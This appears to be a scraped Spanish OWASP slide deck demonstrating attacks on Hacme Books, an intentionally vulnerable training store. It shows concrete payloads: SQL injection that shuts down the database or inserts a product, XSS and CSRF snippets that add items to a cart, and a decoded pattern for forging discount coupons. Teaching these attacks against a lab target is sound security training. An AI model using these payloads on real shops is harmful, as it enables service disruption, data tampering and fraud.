270 likes | 415 Vues
Ejemplos Prácticos de Hacking a un eCommerce Mateo Martínez , QSA, CISSP OWASP URUGUAY. OWASP Vulnerable Web Applications Directory Project. Get out of Jail!. http:// goo.gl /84NfEv. HackPack v1.0 Hacme Bank - Android v1.0 Hacme Bank v2.0 Hacme Books Hacme Casino v1.0
E N D
EjemplosPrácticos de Hacking a un eCommerce Mateo Martínez, QSA, CISSP OWASP URUGUAY
OWASP Vulnerable Web Applications Directory Project Get out of Jail! http://goo.gl/84NfEv
HackPack v1.0 Hacme Bank - Android v1.0 Hacme Bank v2.0 HacmeBooks Hacme Casino v1.0 Hacme Shipping HacmeTravel
#1 Generación de Errores
• Tipo de BD – Hypersonic SQL (org.hsqldb) • Servidor de Aplicación – Apache Tomcat • Utiliza Spring framework • Aplicación J2EE application – Java namespaces “ ’ ”
#2 Inyección SQL (a)
Comandoparahacer un halt al servidorde BD en HSQLDB : SHUTDOWN
Comandoparahacer un halt al servidorde BD en HSQLDB : SHUTDOWN
select * from products where title like '%texto_del_usuario%' and like '%otro_texto_del_usuario%'
select * from products where title like '%'; SHUTDOWN; --%' and like '%otro_texto_del_usuario%'
#2 Inyección SQL (b)
my feedback', 735); insert into products (title, description, popularity, price, vendor, category, publisher, isbn, author, imgurl, quantity) values ('Eat my shorts you pointy haired boss','A great book',4,29.95,'Amazon','Technical','Addison Wesley','1234567890123','Disgruntled Employee','http://',1); --
#3 XSS (Cross-Site Scripting)
You should buy our latest bestseller instead of this book. <script> location="http://localhost:8989/HacmeBooks/addShoppingCart.html?productId=1470" </script>
#4 CSRF (Cross-Site Request Forgery)
You should really consider purchasing the latest bestseller. <img src=http://localhost:8989/HacmeBooks/addShoppingCart.html?productId=1470 height="1"/>
#5 Crypto
15 % de Descuento AEODBOBOOF 25% de Descuento BEAAABBOOF BEOABDBOOF
AEODBOBOOF BEAAABBOOF BEOABDBOOF 2511122006 2501242006 BEAAAB2006 BEOABD2006
% MesDíaAño 15 04 20 2006 25 11 12 2006 95 04 20 2014 IE OD BO BOAD Probarestecupón: IEODBOBOAD
#6 Broken Access Control
Hacme Books http://sourceforge.net/projects/foundstone
¡Muchas gracias! mateo.martinez@owasp.org